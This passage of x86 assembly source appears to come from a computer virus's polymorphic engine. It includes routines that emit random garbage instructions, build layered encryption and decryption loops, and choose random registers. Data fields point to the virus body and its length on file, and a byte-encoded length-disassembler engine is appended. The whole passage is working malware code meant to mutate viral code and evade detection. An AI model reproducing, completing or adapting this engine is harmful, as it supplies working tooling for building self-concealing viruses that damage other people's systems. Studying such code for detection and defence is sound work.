al,89h selected_op: mov ch,al bswap eax mov al,byte ptr [ebp + t_pushed] ; 'our' dd on stack or al,al jz cant_write_anyway cmp byte ptr [ebp + t_inacall],01h je cant_write_anyway dec al mov cl,al call get_random_al7 cmp al,cl ja cant_write_anyway ; don't retry, so less writes mov ah,al jmp prepare_all cant_write_anyway: and ah,0111b add ch,02h prepare_all: mov al,ch stosb call get_register shl cl,3 or ah,ah jz dont_addesp ; just [esp], no + imm add cl,40h dont_addesp: add cl,04h xchg al,cl stosb mov al,24h stosb or ah,ah jz no_immesp shl ah,2 ; * 4, dword padded is always used mov al,ah stosb no_immesp: ret ; tables for various purposes garbage_mask equ 1fh garbage_number equ 14h garbage_offsets: dd offset call_subroutines dd offset gen_one_byters dd offset mov_registers dd offset mem_assign dd offset mem_mathops dd offset maths_immediate dd offset maths_immediate_short dd offset maths_registers dd offset rotating_imms dd offset notneg_register dd offset imm_assign dd offset inc_dec_reg dd offset xchg_regs dd offset test_regs dd offset temp_save_change dd offset cdq_jmps_savestack dd offset diff_movz dd offset sets_misc dd offset xadd_cmpxchg dd offset emu_stuffy dd offset from_stack one_byters db 090h,0fch,0fdh,0f8h,0f9h,0f5h,070h,080h change_jump db 098h,099h,0ebh,0e9h _math_imm: dw 008c1h ; ror d[ebx],imm dw 02881h ; sub d[ebx],imm dw 03081h ; xor d[ebx],imm dw 00081h ; add d[ebx],imm dw 000c1h ; rol d[ebx],imm _math_key: dw 008d3h ; ror d[ebx],cl dw 00029h ; sub d[ebx],eax dw 00031h ; xor d[ebx],eax dw 00001h ; add d[ebx],eax dw 000d3h ; rol d[ebx],cl ; cmp,or,xor,sub,add chk_counter db 0f8h,0c8h key_changers db 0e8h,0f0h,0c0h ; xor sub add db 0c0h,0c8h ; ror rol db 0d0h ; not db 040h,048h ; inc dec krappo_gen: call get_random ; generate krap bytes and eax,01fh jz exit_krappo xchg eax,ecx krap_stuffy: call get_random stosb loop krap_stuffy exit_krappo: ret get_random_al7: call get_random and eax,0111b ret get_random: push ebx push edx db 0b8h ; mov eax, seed dd 000h ; random seed, must be < im mov ebx,4096d ; ia mul ebx add eax,150889d ; ic adc edx,0 mov ebx,714025d ; im push ebx div ebx mov dword ptr [seed+ebp],edx xchg eax,edx cdq xor ebx,ebx dec ebx mul ebx ; * 2^32 - 1 pop ebx div ebx ; here we have a 0<=rnd<=2^32 pop edx pop ebx ret is_used: ; AL register push eax mov cl,al mov al,1 shl al,cl test byte ptr [r_used+ebp],al pop eax ; Z = register not used ; NZ = register used ret set_used: ; AL register push eax xor ah,ah bts word ptr [r_used+ebp],ax pop eax ret unset_used: ; BL register xor bh,bh btr word ptr [r_used+ebp],bx ret get_register: push eax reget_reg: call get_random_al7 call is_used jnz reget_reg ; check we aren't using it ; the is_used will put the reg in cl pop eax ret get_address: push esi mov ebx,edi lea esi,[offset v_runnin + ebp] db 081h,0ebh ; sub ebx,initial_edi t_inipnt dd 00h ; so we have actualy dec lenght add ebx,dword ptr [esi - (offset v_runnin - offset v_lenght)] mov edx,dword ptr [esi] db 0b1h ; mov cl, t_memand db 00h ; significant bits present add edx,ebx search_offset2: call get_random shl eax,cl shr eax,cl cmp eax,dword ptr [esi] ; is < starting off of poly? jb search_offset2 look_foroff2: cmp eax,edx ; upper border jbe ok_offset2 sub eax,ebx jmp look_foroff2 ok_offset2: pop esi ret ; how much memory does the ETMS need, so you can substract from the lenght ; of the virus on file of course _mem_space = (offset _mem_data_end - offset _mem_data_start) ; everything down there just in mem, don't save it in your file _mem_data_start: r_pointer db 00h ; register used as pointer r_counter db 00h ; register used as counter r_regkey db 00h ; register used as key, 20h use ; immediate as key r_used db 00000000b ; bits meaning 0 0 0 1 0 0 0 0 ; E E E E E E E E ; D S B S B D C A ; I I P P X X X X t_chgpnt db 00h ; changes to be made to pointer t_chgcnt db 00h ; changes to be made to counter t_chgkey db 00h ; changes to be made to key register t_chgmat db 00h ; changes to be made to operation t_exitjmp db 00h ; 01 has to create exit jmp, 00h no t_prejmp db 00h ; number of key changes b4 jmp m_writes db 00h ; already written mem in a loop? ; ne stavit nic tukaj ali menjaj inicializacijo! t_pntoff dd 00h ; offset added to pointer (00h if not ; added) t_cntoff dd 00h ; constant to be added to counter ; value t_fromend db 00h ; 00h from start, else from end t_countback db 00h ; 01h decrementing, else incrementing t_pushed db 00h ; pushed dwords t_maxjmps db 00h ; max jumps t_inacall db 00h ; into a call or not db 00h v_lenght dd 00h ; lenght v_virusp dd 00h ; pointer to body v_runnin dd 00h ; offset at which dec will run w_counter dd 00h ; where counter is assigned - 1 w_loopbg dd 00h ; where loop begins w_encrypt dd 00h ; pointer on current pos in encryptor orig_dx dd 00h t_chkpos dd 00h ; position of the checking jmp l_space equ (enc_max + 10h) tl_space equ (6 * l_space) layer_end dd 00h ; last nr of layer * layer dim layer_nr dd tl_space ; number of layers (0-6) * layer dim ; data structures for all the layers ; first layer is the last in mem and so on... enc_space: dd 00h ; initial key dd 00h ; counter dd 00h ; initial pointer dd 00h ; position of the pointer in dec db enc_max dup (90h) ; encryptor dd 4 dup (00h) db enc_max dup (90h) dd 4 dup (00h) db enc_max dup (90h) dd 4 dup (00h) db enc_max dup (90h) dd 4 dup (00h) db enc_max dup (90h) dd 4 dup (00h) db enc_max dup (90h) dd 4 dup (00h) db enc_max dup (90h) _mem_data_end: ; LDE32BIN.INC -- Length-Disassembler Engine //32-bit ; 1.06 ; generated file. do not edit disasm_init: db 060h,08Bh,07Ch,024h,024h,0FCh,033h,0C0h db 050h,050h,050h,068h,000h,0A8h,0AAh,002h db 068h,07Fh,068h,0FFh,03Fh,068h,0A0h,0DEh db 0E6h,0FFh,068h,0FFh,0FFh,0D5h,0DBh,068h db 0AAh,0AAh,0FEh,0FFh,068h,0AAh,0AAh,0AAh db 0AAh,068h,000h,000h,0AAh,0AAh,050h,050h db 050h,050h,050h,050h,068h,054h,001h,000h db 000h,068h,055h,0F5h,0FFh,041h,068h,0AAh db 0DDh,0DEh,055h,068h,011h,051h,095h,019h db 068h,0FFh,01Fh,011h,011h,068h,0AAh,0FFh db 011h,0FAh,068h,096h,0CFh,060h,08Eh,068h db 0AAh,0D6h,072h,0FCh,068h,088h,0AAh,0AAh db 0AAh,068h,0D5h,088h,088h,088h,068h,09Bh db 055h,08Dh,052h,068h,053h,0D5h,06Ch,036h db 068h,0FFh,055h,055h,035h,068h,0F9h,0D6h db 0FEh,0FFh,068h,088h,088h,088h,068h,068h db 088h,088h,088h,088h,068h,0CAh,047h,053h db 08Dh,068h,0DFh,07Bh,0C6h,0DCh,068h,0AAh db 0AAh,0AAh,0AAh,068h,0AAh,0AAh,0AAh,0AAh db 068h,0FDh,04Fh,0A9h,0ABh,068h,0EAh,0FEh db 0A7h,0D4h,068h,029h,075h,0FFh,053h,068h db 0FEh,0A7h,0A4h,0FFh,068h,04Ah,0FAh,09Fh db 092h,068h,0FFh,029h,0E9h,07Fh,0B9h,000h db 002h,000h,000h,033h,0DBh,033h,0C0h,0E8h db 014h,000h,000h,000h,0ABh,0E2h,0F6h,061h db 0C3h,00Bh,0DBh,075h,007h,05Dh,05Eh,05Ah db 056h,055h,0B3h,020h,04Bh,0D1h,0EAh,0C3h db 0E8h,0ECh,0FFh,0FFh,0FFh,00Fh,083h,07Fh db 000h,000h,000h,0E8h,0E1h,0FFh,0FFh,0FFh db 073h,003h,0B4h,040h,0C3h,0E8h,0D7h,0FFh db 0FFh,0FFh,072h,057h,0E8h,0D0h,0FFh,0FFh db 0FFh,073h,04Dh,0E8h,0C9h,0FFh,0FFh,0FFh db 073h,043h,0E8h,0C2h,0FFh,0FFh,0FFh,072h db 025h,0E8h,0BBh,0FFh,0FFh,0FFh,073h,003h db 0B0h,020h,0C3h,0E8h,0B1h,0FFh,0FFh,0FFh db 073h,005h,066h,0B8h,002h,020h,0C3h,0E8h db 0A5h,0FFh,0FFh,0FFh,073h,005h,066h,0B8h db 008h,010h,0C3h,0B4h,003h,0C3h,0E8h,096h db 0FFh,0FFh,0FFh,073h,003h,0B4h,060h,0C3h db 0E8h,08Ch,0FFh,0FFh,0FFh,073h,003h,0B0h db 018h,0C3h,0B4h,002h,0C3h,0B4h,080h,0C3h db 0B4h,001h,0C3h,0E8h,079h,0FFh,0FFh,0FFh db 073h,00Dh,0E8h,072h,0FFh,0FFh,0FFh,073h db 003h,0B0h,008h,0C3h,0B4h,041h,0C3h,0B4h db 020h,0C3h,0E8h,062h,0FFh,0FFh,0FFh,014h db 000h,048h,0C3h disasm_main: db 060h,08Bh,074h,024h,024h,08Bh,04Ch,024h db 028h,033h,0D2h,033h,0C0h,080h,0E2h,0F7h db 08Ah,001h,041h,00Bh,014h,086h,0F6h,0C2h db 008h,075h,0F2h,03Ch,0F6h,074h,036h,03Ch db 0F7h,074h,032h,03Ch,0CDh,074h,03Bh,03Ch db 00Fh,074h,044h,0F6h,0C6h,080h,075h,052h db 0F6h,0C6h,040h,075h,073h,0F6h,0C2h,020h db 075h,054h,0F6h,0C6h,020h,075h,05Ch,08Bh db 0C1h,02Bh,044h,024h,028h,081h,0E2h,007h db 007h,000h,000h,002h,0C2h,002h,0C6h,089h db 044h,024h,01Ch,061h,0C3h,080h,0CEh,040h db 0F6h,001h,038h,075h,0CEh,080h,0CEh,080h db 0EBh,0C9h,080h,0CEh,001h,080h,039h,020h db 075h,0C1h,080h,0CEh,004h,0EBh,0BCh,08Ah db 001h,041h,00Bh,094h,086h,000h,004h,000h db 000h,083h,0FAh,0FFh,075h,0ADh,08Bh,0C2h db 0EBh,0CDh,080h,0F6h,020h,0A8h,001h,075h db 0A7h,080h,0F6h,021h,0EBh,0A2h,080h,0F2h db 002h,0F6h,0C2h,010h,075h,0A4h,080h,0F2h db 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